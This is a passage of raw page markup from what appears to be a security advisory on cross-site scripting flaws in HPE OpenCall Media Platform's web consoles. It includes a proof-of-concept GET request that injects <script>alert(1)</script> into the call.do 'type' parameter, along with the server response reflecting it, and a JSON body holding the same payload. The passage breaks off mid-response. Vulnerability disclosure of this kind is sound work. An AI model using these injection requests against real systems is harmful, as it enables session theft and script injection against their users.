class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Wed<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">23<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Sep<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2015<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">35<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835eb165529641-7\"><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Web<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Server<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835eb165529641-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835eb165529641-9\"><span class=\"crayon-e\">da<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835eb165529641-10\"><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;id&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;test&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;haschildren&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;false&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;description&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;<span class=\"crayon-ta\">&lt;script&gt;<\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span>&#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;condition_type&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;NONE&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;lastmodified&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1443024815131<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;hascontent&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;true&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;contentType&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;text\/plain&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;data&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;contentLength&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835eb165529641-11\"><span class=\"crayon-cn\">0<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0036 seconds] -->  <\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/Application-Content-Manager-Parameter.png\" data-slb-active=\"1\" data-slb-asset=\"604037627\" data-slb-internal=\"0\" data-slb-group=\"3087\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3089\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/Application-Content-Manager-Parameter-300x169.png\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/Application-Content-Manager-Parameter-300x169.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/Application-Content-Manager-Parameter-768x432.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/Application-Content-Manager-Parameter-1024x576.png 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/Application-Content-Manager-XSS.png\" data-slb-active=\"1\" data-slb-asset=\"501322561\" data-slb-internal=\"0\" data-slb-group=\"3087\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3088\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/Application-Content-Manager-XSS-300x169.png\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/Application-Content-Manager-XSS-300x169.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/Application-Content-Manager-XSS-768x432.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/Application-Content-Manager-XSS-1024x576.png 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>VoiceXML Administration Tool &#8211; <em>call.do<\/em> function<\/strong><br \/> HPE OpenCall Media Platform (OCMP) does not sanitize <em>call.do<\/em> function parameters input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL: <em>\/om\/call.do?action=list_calls&amp;type=<strong>XSS_HERE<\/strong><\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da835f0615216791\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/om\/call.do?action=list_calls&amp;type=Active637a3&lt;script&gt;alert(1)&lt;%2fscript&gt;c7e9f HTTP\/1.1  Accept: text\/html, application\/xhtml+xml, *\/*  Referer: https:\/\/127.0.0.1:5443\/om\/servicegroup.do?action=addservicegroup  Accept-Language: en-GB  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko  Accept-Encoding: gzip, deflate  Host: 127.0.0.1:5443  DNT: 1  Connection: Keep-Alive  Cookie: JSESSIONID=5F9196107A3454133D4190CDB086E03B<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835f0615216791-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835f0615216791-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835f0615216791-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835f0615216791-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835f0615216791-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835f0615216791-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835f0615216791-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835f0615216791-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835f0615216791-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835f0615216791-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f0615216791-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">om<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">call<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list_calls<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Active637a3<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">c7e9f <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f0615216791-2\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f0615216791-3\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/127.0.0.1:5443\/om\/servicegroup.do?action=addservicegroup<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f0615216791-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">GB<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f0615216791-5\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Trident<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">7.0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">11.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">like <\/span><span class=\"crayon-e\">Gecko<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f0615216791-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f0615216791-7\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">5443<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f0615216791-8\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f0615216791-9\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Alive<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f0615216791-10\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">5F9196107A3454133D4190CDB086E03B<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0037 seconds] -->  <\/p>\n<p>The server will respond with:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da835f5733313357\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP\/1.1 200 OK  Server: Apache-Coyote\/1.1  Pragma: No-cache  Cache-Control: no-cache,no-store  Expires: Thu, 01 Jan 1970 01:00:00 GMT  Content-Type: text\/html;charset=ISO-8859-1  Date: Thu, 10 Sep 2015 13:30:41 GMT  Content-Length: 10418      &lt;HTML&gt;  &lt;HEAD&gt;  &lt;TITLE&gt;VoiceXML Environment Operation and Maintenance on tb0ocmp0&lt;\/TITLE&gt;  &lt;LINK REL=&#8221;stylesheet&#8221; HREF=&#8221;consolepages\/templates\/stylesheets\/style.css&#8221; TYPE=&#8221;text\/css&#8221;&gt;  &lt;\/HEAD&gt;    &lt;BODY&gt;   &lt;script type=&#8221;text\/javascript&#8221;&gt;    \/\/HV Menu v5- by Ger Versluis (www.burmees.nl)  \/\/Submitted to Dynamic Drive (www.dynamicdrive.com)  \/\/Visit www.dynamicdrive.com for this script and more    function Go(){return}    &lt;\/script&gt;  &lt;script type=&#8221;text\/javascript&#8221; src=&#8221;consolepages\/templates\/js\/exmplmenu_var.jsp&#8221;&gt;&lt;\/script&gt;  &lt;script type=&#8221;text\/javascript&#8221; src=&#8221;consolepages\/templates\/js\/menu_com.js&#8221;&gt;&lt;\/script&gt;  &lt;noscript&gt;Your browser does not support script&lt;\/noscript&gt;    &lt;TABLE WIDTH=&#8221;800&#8243; BORDER=&#8221;0&#8243;&gt;  &lt;TR&gt;  &lt;TD&gt;&lt;IMG SRC=&#8221;consolepages\/templates\/images\/speechweb.gif&#8221;\/&gt;&lt;\/TD&gt;  &lt;\/TR&gt;  &lt;TR&gt;    &lt;TD VALIGN=&#8221;top&#8221;&gt;  Logged on as: zerpsta1 &lt;SPAN id=&#8221;warn&#8221;&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;      &lt;\/SPAN&gt;  &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;      &lt;br&gt;  &lt;b&gt;Call Management -&gt; Active637a3&lt;script&gt;alert(1)&lt;\/script&gt;c7e9f Calls&lt;\/b&gt;    &lt;br&gt;&lt;br&gt;&lt;br&gt;    &lt;table border=&#8221;1&#8243; width=&#8221;1000&#8243;&gt;  &lt;tr&gt;&lt;td colspan=&#8221;12&#8243; class=&#8221;tableheader&#8221;&gt;Calls &lt;a href=&#8221;#&#8221;&gt;&lt;img src=&#8221;consolepages\/templates\/images\/questionmark.gif&#8221; border=&#8221;0&#8243; onClick=&#8221;window.open(&#8216;help.do?prompt=p20&#8217;, &#8216;help&#8217;, &#8216;toolbar=no,width=400,height=400,resizable=no,scrollbars=yes&#8217;);&#8221;&gt;&lt;\/a&gt;&lt;\/td&gt;&lt;\/tr&gt;  &lt;tr&gt;&lt;td colspan=&#8221;12&#8243;&gt;&amp;nbsp;&lt;\/td&gt;&lt;\/tr&gt;  &lt;tr&gt;  &lt;td&gt;&lt;b&gt;&lt;a href=call.do?action=sort_calls&amp;type=node&gt;Server Id&lt;\/a&gt;&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;&lt;a href=call.do?action=sort_calls&amp;type=callid&gt;CallId&lt;\/a&gt;&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;CDR&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;Call Monitoring&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;Service Id&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;&lt;a href=call.do?action=sort_calls&amp;type=ruri&gt;Remote-URI&lt;\/a&gt;&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;&lt;a href=call.do?action=sort_calls&amp;type=luri&gt;Local-URI&lt;\/a&gt;&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;&lt;a href=call.do?action=sort_calls&amp;type=severe&gt;Severes&lt;\/a&gt;&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;&lt;a href=call.do?action=sort_calls&amp;type=warning&gt;Warnings&lt;\/a&gt;&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;&lt;a href=call.do?action=sort_calls&amp;type=vxml_exception&gt;VoiceXML Exceptions&lt;\/a&gt;&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;&lt;a href=call.do?action=sort_calls&amp;type=time&gt;Started At&lt;\/a&gt;&lt;\/b&gt;&lt;\/td&gt;    &lt;td&gt;&lt;b&gt;Duration&lt;\/b&gt;&lt;\/td&gt;      &lt;\/tr&gt;                  &lt;tr bgcolor=&#8221;eeeeee&#8221;&gt;            &lt;td&gt;tb0ocmp1&lt;\/td&gt;            &lt;td&gt;&lt;a href=&#8221;proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&amp;contenttype=text\/html&#8221; target=&#8221;_new&#8221;&gt;vxi_dialog_0_32_634_3&lt;\/a&gt;&lt;\/td&gt;            &lt;td&gt;&lt;a href=&#8221;proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&#8243; target=&#8221;_new&#8221;&gt;CDR&lt;\/a&gt;&lt;\/td&gt;      &lt;td&gt;&lt;a href=&#8221;call.do?action=monitor&amp;cid=vxi_dialog_0_32_634_3&amp;node=tb0ocmp1&#8243;&gt;Monitor&lt;\/a&gt;&lt;\/td&gt;                &lt;td&gt;&lt;a href=&#8221;service.do?action=update&amp;id=o2_ivr_0xxx&#8221;&gt;o2_ivr_0xxx&lt;\/a&gt;&lt;\/td&gt;            &lt;td&gt;sip:unavailable@unknown.invalid&lt;\/td&gt;      &lt;td&gt;+1542000470521123&lt;\/td&gt;      &lt;td&gt;&lt;a href=event.do?action=list&amp;callid=vxi_dialog_0_32_634_3&amp;type=ERROR target=&#8221;new&#8221;&gt;1&lt;\/a&gt;&lt;\/td&gt;      &lt;td&gt;&lt;a href=event.do?action=list&amp;callid=vxi_dialog_0_32_634_3&amp;type=WARN target=&#8221;new&#8221;&gt;0&lt;\/a&gt;&lt;\/td&gt;      &lt;td&gt;&lt;a href=event.do?action=list&amp;callid=vxi_dialog_0_32_634_3&amp;type=vxml_exception target=&#8221;new&#8221;&gt;21&lt;\/a&gt;&lt;\/td&gt;      &lt;td&gt;150909 19:00:52.429&lt;\/td&gt;&lt;td&gt;00:00:00.502&lt;\/td&gt;               &lt;\/tr&gt;                   &lt;tr&gt;            &lt;td&gt;tb0ocmp0&lt;\/td&gt;            &lt;td&gt;&lt;a href=&#8221;proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&amp;contenttype=text\/html&#8221; target=&#8221;_new&#8221;&gt;vxi_dialog_0_40_420_2&lt;\/a&gt;&lt;\/td&gt;            &lt;td&gt;&lt;a href=&#8221;proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&#8243; target=&#8221;_new&#8221;&gt;CDR&lt;\/a&gt;&lt;\/td&gt;      &lt;td&gt;&lt;a href=&#8221;call.do?action=monitor&amp;cid=vxi_dialog_0_40_420_2&amp;node=tb0ocmp0&#8243;&gt;Monitor&lt;\/a&gt;&lt;\/td&gt;                &lt;td&gt;&lt;a href=&#8221;service.do?action=update&amp;id=o2_ivr_0xxx&#8221;&gt;o2_ivr_0xxx&lt;\/a&gt;&lt;\/td&gt;            &lt;td&gt;sip:unavailable@unknown.invalid&lt;\/td&gt;      &lt;td&gt;+1542000470174023&lt;\/td&gt;      &lt;td&gt;&lt;a href=event.do?action=list&amp;callid=vxi_dialog_0_40_420_2&amp;type=ERROR target=&#8221;new&#8221;&gt;1&lt;\/a&gt;&lt;\/td&gt;      &lt;td&gt;&lt;a href=event.do?action=list&amp;callid=vxi_dialog_0_40_420_2&amp;type=WARN target=&#8221;new&#8221;&gt;0&lt;\/a&gt;&lt;\/td&gt;      &lt;td&gt;&lt;a href=event.do?action=list&amp;callid=vxi_dialog_0_40_420_2&amp;type=vxml_exception target=&#8221;new&#8221;&gt;21&lt;\/a&gt;&lt;\/td&gt;      &lt;td&gt;150908 19:29:05.236&lt;\/td&gt;&lt;td&gt;00:00:00.501&lt;\/td&gt;               &lt;\/tr&gt;                  &lt;tr bgcolor=&#8221;eeeeee&#8221;&gt;            &lt;td&gt;tb0ocmp1&lt;\/td&gt;            &lt;td&gt;&lt;a href=&#8221;proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&amp;contenttype=text\/html&#8221; target=&#8221;_new&#8221;&gt;vxi_dialog_0_32_634_2&lt;\/a&gt;&lt;\/td&gt;            &lt;td&gt;&lt;a href=&#8221;proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&#8243; target=&#8221;_new&#8221;&gt;CDR&lt;\/a&gt;&lt;\/td&gt;      &lt;td&gt;&lt;a href=&#8221;call.do?action=monitor&amp;cid=vxi_dialog_0_32_634_2&amp;node=tb0ocmp1&#8243;&gt;Monitor&lt;\/a&gt;&lt;\/td&gt;                &lt;td&gt;&lt;a href=&#8221;service.do?action=update&amp;id=o2_ivr_0xxx&#8221;&gt;o2_ivr_0xxx&lt;\/a&gt;&lt;\/td&gt;            &lt;td&gt;sip:unavailable@unknown.invalid&lt;\/td&gt;      &lt;td&gt;+1542000470852423&lt;\/td&gt;      &lt;td&gt;&lt;a href=event.do?action=list&amp;callid=vxi_dialog_0_32_634_2&amp;type=ERROR target=&#8221;new&#8221;&gt;1&lt;\/a&gt;&lt;\/td&gt;      &lt;td&gt;&lt;a href=event.do?action=list&amp;callid=vxi_dialog_0_32_634_2&amp;type=WARN target=&#8221;new&#8221;&gt;0&lt;\/a&gt;&lt;\/td&gt;      &lt;td&gt;&lt;a href=event.do?action=list&amp;callid=vxi_dialog_0_32_634_2&amp;type=vxml_exception target=&#8221;new&#8221;&gt;21&lt;\/a&gt;&lt;\/td&gt;      &lt;td&gt;150908 19:27:56.237&lt;\/td&gt;&lt;td&gt;00:00:01.003&lt;\/td&gt;             &lt;\/tr&gt;              &lt;tr&gt;            &lt;td&gt;tb0ocmp0&lt;\/td&gt;            &lt;td&gt;&lt;a href=&#8221;proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&amp;contenttype=text\/html&#8221; target=&#8221;_new&#8221;&gt;vxi_dialog_0_40_420_1&lt;\/a&gt;&lt;\/td&gt;            &lt;td&gt;&lt;a 